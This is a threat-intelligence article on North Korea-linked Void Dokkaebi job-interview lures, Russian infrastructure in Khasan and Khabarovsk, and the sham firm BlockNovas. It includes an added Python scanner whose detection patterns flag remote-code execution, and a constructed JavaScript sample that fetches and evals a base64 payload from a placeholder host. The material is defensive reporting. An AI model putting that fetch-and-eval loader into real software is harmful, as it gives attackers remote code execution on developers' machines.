Role of Russian Infrastructure in Cybercrime Operations Linked to North Korea

Research Trends have detected various IP address ranges in Russia employed for cyber criminality in collaboration with North Korea.

Russian Infrastructure Plays Crucial Role in North Korean Cybercrime Operations
  • Research Trends have detected various IP address ranges in Russia employed for cyber criminality in collaboration with North Korea. These operations are connected to a series of campaigns associated with the Void Dokkaebi intrusion set, also referred to as Famous Chollima.
  • The IP address ranges in Russia are masked by an extensive anonymization network utilizing commercial VPN services, proxy servers, and multiple VPS servers with RDP. These ranges are attributed to two companies based in Khasan and Khabarovsk. Khasan is situated close to the border between North Korea and Russia, while Khabarovsk is recognized for its economic and cultural relations with North Korea.
  • Research Trends indicate that North Korea has deployed IT personnel who establish connections back to their home country through two IP addresses within the Russian IP ranges and two IP addresses in North Korea. As per telemetry data from Trend Micro, these IT employees associated with the DPRK operate from locations such as China, Russia, and Pakistan.
  • According to the evaluation by Research Trends, actors aligned with North Korea utilize the Russian IP ranges to link to numerous VPS servers using RDP, engaging in activities like online interactions on recruitment portals and accessing services related to cryptocurrencies. Some of the servers used in their brute-force attempts against cryptocurrency wallet passwords fall within one of the Russian IP ranges.
  • There have been discoveries of instructional videos featuring non-native English text, providing guidance on establishing a Beavertail malware command-and-control server and cracking cryptocurrency wallet passwords. This suggests potential collaboration between North Korea and foreign collaborators.
  • Software professionals in Ukraine, the US, and Germany have been targeted in these operations by fictitious organizations enticing them with deceptive job interviews. Research Trends indicate that the primary objective of Void Dokkaebi is to pilfer cryptocurrencies from individuals with expertise in cryptocurrency, Web3, and blockchain technologies.
  • Trend Vision One™ has the capability to identify and block the Indicators of Compromise (IOCs) elaborated in this article. Customers of Trend Vision One can also access search queries, insights on threats, and reports on threat intelligence to acquire in-depth knowledge and stay updated on Void Dokkaebi.

In North Korea, internet access is limited, with only 1,024 IP addresses assigned to their national network. Despite this constraint, the country plays a significant role in cyber criminal activities. Numerous high-profile campaigns have been attributed to North Korean operatives by international law enforcement agencies, including the recent US$1.5 billion Bybit hack. Conducting cybercrime operations on the scale associated with North Korea requires far more internet resources than those 1,024 IP addresses provide. One strategy to achieve this involves deploying or recruiting a substantial number of IT professionals overseas to work remotely. Moreover, sophisticated anonymization networks are utilized to cloak campaigns linked to North Korea, complicating the process of attribution.

This article delves into the roots of certain campaigns affiliated with North Korea originating from five IP ranges in Russia. These IP ranges are concealed through a layer of VPN, proxy, or RDP. They are allocated to two entities located in Khasan and Khabarovsk, Russia. It is noted that campaigns associated with North Korea also leverage internet infrastructure in various other nations.

Located near the border with North Korea and China, Khasan is a town in Russia that hosts the Korea-Russia Friendship Bridge. Khabarovsk, on the other hand, is renowned for its close economic and cultural connections with North Korea. Hence, these towns serve as ideal hubs for cybercrime operations aligned with North Korea’s objectives. Investigations reveal that the Russian IP ranges connect with multiple VPS servers across the globe using RDP and then perform diverse activities such as communication on platforms like Skype, Telegram, Discord, and Slack, engaging with foreign IT professionals on job platforms, and accessing cryptocurrency-related platforms for purposes like draining stolen cryptocurrency wallets or laundering illicit funds.

Foreign IT experts are targeted through a common social engineering tactic that involves enticing software developers with fake job opportunities. In this scheme, developers apply for advertised positions on platforms such as LinkedIn. The deceiving recruiters prompt the applicants to execute specific tasks as part of the recruitment process. These tasks may involve debugging or enhancing code fetched from reputable repositories like GitHub, GitLab, Bitbucket, or private GitLab sites. Although these repositories typically do not host malicious code directly, they may harbor code injecting obfuscated harmful scripts from third-party websites. If the applicant runs this code on their personal system instead of an isolated virtual environment, the attacker gains unauthorized access.

Subsequently, the attacker might deploy additional malware to pilfer sensitive data like passwords and cryptocurrency wallets. They may then attempt to siphon funds from cryptocurrency wallets and access other confidential data. Some compromised devices are integrated into the attacker’s anonymizing network by installing legitimate proxy software like CCProxy.
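The lure described in the two paragraphs above relies on a repository whose own files look harmless but fetch and execute an obfuscated script from a third-party site at run time. The following Python check is an added example (not code from the original article or from Trend Micro) that a developer or a security team can run over a "take-home task" repository before executing it; the signal names, regexes and severity weights are assumptions, and the sample files are constructed.

```python
import re
from pathlib import Path

# Heuristic building blocks of the "clean repo, remote payload" pattern
# (assumed signal names and regexes; tune to the languages you review).
SIGNALS = {
    "remote_url":   re.compile(r"https?://[^\s'\"]+"),
    "dynamic_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\(|vm\.runIn\w*Context\s*\("),
    "decode":       re.compile(r"Buffer\.from\([^)]*['\"](base64|hex)['\"]|\batob\s*\("),
    "shell_exec":   re.compile(r"child_process|\b(exec|execSync|spawn)\s*\("),
    "opaque_blob":  re.compile(r"['\"][A-Za-z0-9+/=]{120,}['\"]"),
}

def scan_source(text: str) -> dict:
    """Return which signals fire in one file and a severity for it."""
    hits = {name: bool(rx.search(text)) for name, rx in SIGNALS.items()}
    fetch_and_run = hits["dynamic_eval"] and (hits["remote_url"] or hits["decode"])
    if fetch_and_run or (hits["shell_exec"] and hits["remote_url"]):
        severity = "high"    # pulls content from outside and executes it: read by hand first
    elif any(hits.values()):
        severity = "review"  # a single building block; worth a look, not proof
    else:
        severity = "none"
    return {"severity": severity, "hits": [k for k, v in hits.items() if v]}

def scan_repo(root: str, suffixes=(".js", ".ts", ".mjs", ".cjs", ".py")) -> dict:
    """Scan every source file under root; returns {relative_path: result} for flagged files."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in suffixes:
            result = scan_source(path.read_text(errors="ignore"))
            if result["severity"] != "none":
                report[str(path.relative_to(root))] = result
    return report

# Constructed sample: a "config loader" that quietly fetches and runs remote code.
SAMPLE_LURE = """
const axios = require('axios');
async function loadConfig() {
  const r = await axios.get('http://example.invalid/api/config');  // placeholder URL
  eval(Buffer.from(r.data.payload, 'base64').toString());
}
"""
# Constructed sample: ordinary project code with none of the building blocks.
SAMPLE_CLEAN = "const add = (a, b) => a + b;\nmodule.exports = { add };\n"
```

Run `scan_repo("<path-to-cloned-repo>")` before `npm install` or `npm start`; anything rated "high" should be read in full, and the task should in any case be executed only in a disposable virtual machine.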

In another scenario, North Korean IT personnel secure IT roles at Western companies and utilize laptop farms run by collaborators residing in Western countries. Through these laptop farms, North Korean IT workers can conceal from their victim companies that they are working remotely from another country. Research Trends suggest that this setup closely correlates with Beavertail malware campaigns.

This article also explores clusters of Beavertail malware campaigns tied to Void Dokkaebi (also recognized as Famous Chollima). The focus is on a fictitious entity named BlockNovas, which has an online presence through a website and profiles on various job platforms like LinkedIn and Upwork. Numerous applicants have responded to job postings by BlockNovas, with some falling prey to malware during the interview process. BlockNovas advertises vacancies targeting experts in web3 and blockchain technologies in countries like Ukraine, the US, Germany, and others. The entity has employed Beavertail and Invisible Ferret malware and tactics where applicants are induced to download and run malware to resolve a fictitious issue with their laptop camera during an automated interview process.

During the investigation of BlockNovas, it was observed that the lower levels of anonymization layers feature IP ranges in Russia as previously mentioned. Another group of Beavertail command-and-control (C&C) servers has been operated via VPNs, proxies, and RDP sessions from the same Russian IP ranges.

This leads to an intriguing conjecture: significant North Korean offensive cyber operations are orchestrated from or through internet infrastructure situated in the Russian towns of Khasan and Khabarovsk; this infrastructure has been in place since 2017 and has expanded since 2023.

BlockNovas

One of the fabricated companies utilized to lure victims into these deceptive interviews is BlockNovas[.]com, showcasing a modern website design and focusing on blockchain technologies (Figure 1). It actively maintains a presence on social media platforms like Facebook, X (formerly known as Twitter), LinkedIn, and various job platforms. This online presence aims to enhance credibility and draw unsuspecting software developers into applying for fictitious positions.

BlockNovas is likely leveraging artificial intelligence (AI) to create online identities and conduct interviews. Many legitimate tech job interviews occur online, potentially leading more applicants to lower their guard. Monitoring BlockNovas on platforms like LinkedIn revealed seemingly new employees occupying key positions, such as a chief technology officer (CTO). These profiles, although having a history on the platform and a significant number of followers, occasionally used compromised accounts to boost new job listings. With an appearance of credibility at first glance, BlockNovas has likely attracted numerous job applicants.
